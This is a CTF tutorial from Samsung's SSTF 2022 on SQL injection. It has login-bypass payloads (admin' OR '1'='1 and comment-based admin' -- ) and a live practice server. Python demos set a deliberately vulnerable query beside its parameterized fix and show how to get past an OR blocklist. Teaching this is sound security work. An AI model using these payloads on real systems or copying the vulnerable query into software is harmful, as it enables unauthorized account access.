The document provides an introduction to SQL injection vulnerabilities, explaining that they occur when malicious SQL statements are inserted into user input fields and executed by the backend database. It describes how attackers can exploit these vulnerabilities to dump database contents or login as administrators. The document then demonstrates how SQL injection works through examples, and recommends input validation and prepared statements as ways to prevent SQL injection attacks.

Samsung Research
SSTF 2022 | Hacker’s Playground
Tutorial Guide: SQLi 101 (Web)
SQL Injection?

SQL (Structured Query Language) injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.

Source: https://en.wikipedia.org/wiki/SQL_injection
Old, but steady

[Figure: Web application attack statistics: 2017 in review]
Introduction to the SQL

SELECT statement
▪ Used to select (retrieve) records from a database.
▪ Syntax: SELECT col1, col2, … FROM table_name;

WHERE clause
▪ Used to filter the records returned by an SQL statement.
▪ Syntax: SELECT … FROM table_name WHERE condition;
▪ Logical operators such as AND, OR, etc. are available in the condition.

Example ‘users’ table:

idx | id    | pw
----|-------|------------
1   | James | sosecure
2   | Mike  | mysecretpwd
3   | Smith | mrmrssmith
…   | …     | …

Example
SELECT * FROM `users` WHERE id='Mike' AND pw='mysecretpwd';
Simple Use Case

USER --(request)--> SERVER --(request)--> DB
USER <--(response)-- SERVER <--(response)-- DB
with general login-form

Form fields: user_id, password
Server Implementation

USER --(request: user_id, password)--> SERVER --(SQL query)--> DB
USER <--(response)-- SERVER <--(response)-- DB

// The two request parameters are pasted straight into the SQL string. This is the bug.
$query = "SELECT * FROM `users` WHERE id='{$_GET['id']}' AND pw='{$_GET['pw']}'";
Login Request

USER --(request: user_id, password)--> SERVER --(SQL query)--> DB

https://server/login?id=user_id&pw=password
Query Construction

$query = "SELECT * FROM `users` WHERE id='user_id' AND pw='password'";
Actual Query

SELECT * FROM `users` WHERE id='user_id' AND pw='password'
Malicious Request

USER --(request: id=admin' OR '1'='1, pw=whatever)--> SERVER --(SQL query)--> DB

https://server/login?id=admin' OR '1'='1&pw=whatever
Query Construction

$query = "SELECT * FROM `users` WHERE id='admin' OR '1'='1' AND pw='whatever'";
Actual Query

SELECT * FROM `users` WHERE id='admin' OR '1'='1' AND pw='whatever'

▪ id='admin' is true for the 'admin' record.
▪ '1'='1' AND pw='whatever' is always false, because the password is wrong.
▪ AND binds tighter than OR, so the condition is evaluated as id='admin' OR ('1'='1' AND pw='whatever'). For the 'admin' row the left side alone is true, so that row is returned no matter what password was supplied, and the server treats the request as a successful login as 'admin'.
Prevent SQL Injection

▪ Strong input validation
▪ Use of parameterized queries (prepared statements) or stored procedures
▪ Use of custom error pages, so that database error messages do not reveal the query structure to the attacker
▪ …

Parameterized queries are the primary defense: the statement's structure is fixed before the user's values are bound, so the values can never be parsed as SQL. Input validation and custom error pages are defense in depth, not substitutes.
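The login flow of the preceding slides, as an added example that is not code from the deck: the vulnerable concatenation beside its parameterized form, written in Python against an in-memory SQLite table (the deck's server is PHP with MySQL; the injection mechanics are the same). The user rows are the ones from the SQL introduction slide plus an assumed 'admin' row with an assumed password; the function names are mine. It also goes one step past the slides and shows that the OR trick only works because one OR'd term is true on its own.

```python
"""Vulnerable vs. parameterized login.

Added example, not code from the SSTF deck: it re-creates the deck's PHP
one-liner in Python on an in-memory SQLite database so it runs offline.
Constructed data: the three rows from the deck's 'users' slide plus an
assumed 'admin' row with an assumed password.
"""
import sqlite3

USERS = [
    (1, "James", "sosecure"),
    (2, "Mike", "mysecretpwd"),
    (3, "Smith", "mrmrssmith"),
    (4, "admin", "s3cr3t-admin-pw"),  # assumption: the deck never shows admin's row
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the deck's `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (idx INTEGER PRIMARY KEY, id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    conn.commit()
    return conn


def build_query(user_id: str, pw: str) -> str:
    """The deck's $query line: request values pasted straight into the SQL text."""
    return f"SELECT * FROM users WHERE id='{user_id}' AND pw='{pw}'"


def login_vulnerable(conn: sqlite3.Connection, user_id: str, pw: str):
    """Runs the concatenated query; returns the id of the first matching row
    or None. A quote in the input ends the string literal, and the rest of
    the input is parsed as SQL."""
    row = conn.execute(build_query(user_id, pw)).fetchone()
    return row[1] if row else None


def login_safe(conn: sqlite3.Connection, user_id: str, pw: str):
    """Same lookup as a parameterized query. The SQL text is fixed before the
    inputs are bound, so quotes and keywords in them stay data."""
    row = conn.execute(
        "SELECT * FROM users WHERE id=? AND pw=?", (user_id, pw)
    ).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    conn = make_db()
    payload = "admin' OR '1'='1"  # the deck's id parameter
    print(build_query(payload, "whatever"))
    print(login_vulnerable(conn, "Mike", "mysecretpwd"))  # Mike
    print(login_vulnerable(conn, payload, "whatever"))    # admin
    print(login_safe(conn, payload, "whatever"))          # None
    # OR only helps if one OR'd term is true by itself: AND binds tighter, so
    # "nobody' OR '1'='1" with a wrong password matches no row at all.
    print(login_vulnerable(conn, "nobody' OR '1'='1", "whatever"))  # None
```

Run it with `python3 sqli101.py`. The last line is the point the precedence note on the Actual Query slide makes: with the password wrong, `'1'='1' AND pw='whatever'` is false for every row, so the query returns the admin row only because `id='admin'` matches it.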
Quiz #1

Just try: replay the hacker’s attack from the previous description.

The server is running at
▪ http://sqli101.sstf.site/step1.php
Solution for Quiz #1

You could log in as 'admin' like a hacker!
Let’s practice

Challenge Definition

Same as Quiz #1, but
▪ “OR” is no longer allowed in the input.
Removing unnecessary parts

What we want
▪ SELECT * FROM users WHERE id='admin'
▪ Nothing else after the WHERE condition, in particular no AND pw='…' check.

Comment out
▪ '-- ' or '#' starts a comment in SQL ('#' is MySQL-specific, and in MySQL '--' must be followed by whitespace).
▪ Everything after '-- ' or '#' up to the end of the line is treated as a comment and is not processed.
▪ We can insert '-- ' or '#' into the SQL statement through the input to nullify the clauses we do not want.
Not so complex at all

Give it a shot!

SELECT * FROM `users` WHERE id='admin' -- ' AND pw='whatever'

Actual SQL statement: SELECT * FROM `users` WHERE id='admin'
Commented out: -- ' AND pw='whatever'
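The practice challenge worked through as an added example (not code from the deck): a hypothetical blocklist that rejects the word OR, the deck's comment payload getting past it, the parameterized query that needs no blocklist at all, and a small helper that shows where the SQL parser stops reading. Python with sqlite3 again stands in for PHP/MySQL; the blocklist behaviour, the admin row and all names are assumptions.

```python
"""Comment-based bypass when "OR" is blocked, as in the deck's practice challenge.

Added example, not code from the SSTF deck. Python/sqlite3 stands in for the
deck's PHP/MySQL server. The keyword blocklist is an assumption about how the
challenge rejects OR; the slides only say it is no longer allowed.
"""
import re
import sqlite3

# Constructed data: the deck's three users plus an assumed admin row.
USERS = [
    (1, "James", "sosecure"),
    (2, "Mike", "mysecretpwd"),
    (3, "Smith", "mrmrssmith"),
    (4, "admin", "s3cr3t-admin-pw"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the deck's `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (idx INTEGER PRIMARY KEY, id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


class Blocked(Exception):
    """Input rejected by the keyword blocklist."""


def blocklist_rejects(value: str) -> bool:
    """Hypothetical 'strong input validation': reject the word OR in any case."""
    return re.search(r"\bor\b", value, re.IGNORECASE) is not None


def login_with_blocklist(conn: sqlite3.Connection, user_id: str, pw: str):
    """The deck's concatenated query, guarded by the blocklist. Returns the
    matching id or None; raises Blocked if either input contains OR."""
    for value in (user_id, pw):
        if blocklist_rejects(value):
            raise Blocked(value)
    query = f"SELECT * FROM users WHERE id='{user_id}' AND pw='{pw}'"
    row = conn.execute(query).fetchone()
    return row[1] if row else None


def login_safe(conn: sqlite3.Connection, user_id: str, pw: str):
    """Parameterized version: immune to both payloads without any blocklist."""
    row = conn.execute(
        "SELECT * FROM users WHERE id=? AND pw=?", (user_id, pw)
    ).fetchone()
    return row[1] if row else None


def effective_sql(query: str) -> tuple:
    """Split a statement at the first '--' that lies outside a single-quoted
    string, the way the SQL parser sees it: (executed part, commented-out part)."""
    in_string = False
    i = 0
    while i < len(query):
        if query[i] == "'":
            in_string = not in_string  # an escaped '' toggles twice, which is correct
        elif not in_string and query.startswith("--", i):
            return query[:i], query[i:]
        i += 1
    return query, ""


if __name__ == "__main__":
    conn = make_db()
    print(blocklist_rejects("admin' OR '1'='1"))  # True: the Quiz #1 payload is stopped
    payload = "admin' -- "                         # the challenge payload from the last slide
    query = f"SELECT * FROM users WHERE id='{payload}' AND pw='whatever'"
    print(effective_sql(query))
    print(login_with_blocklist(conn, payload, "whatever"))  # admin
    print(login_safe(conn, payload, "whatever"))            # None
```

Two practical caveats when sending this through the GET parameter of the Login Request slide: the payload must be URL-encoded, with the space after `--` as `%20` (or `+`) and `#` as `%23`, because a bare `#` in a URL is a fragment delimiter and never reaches the server; and the example uses `--` rather than `#` because SQLite has no `#` comments, while MySQL accepts both.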
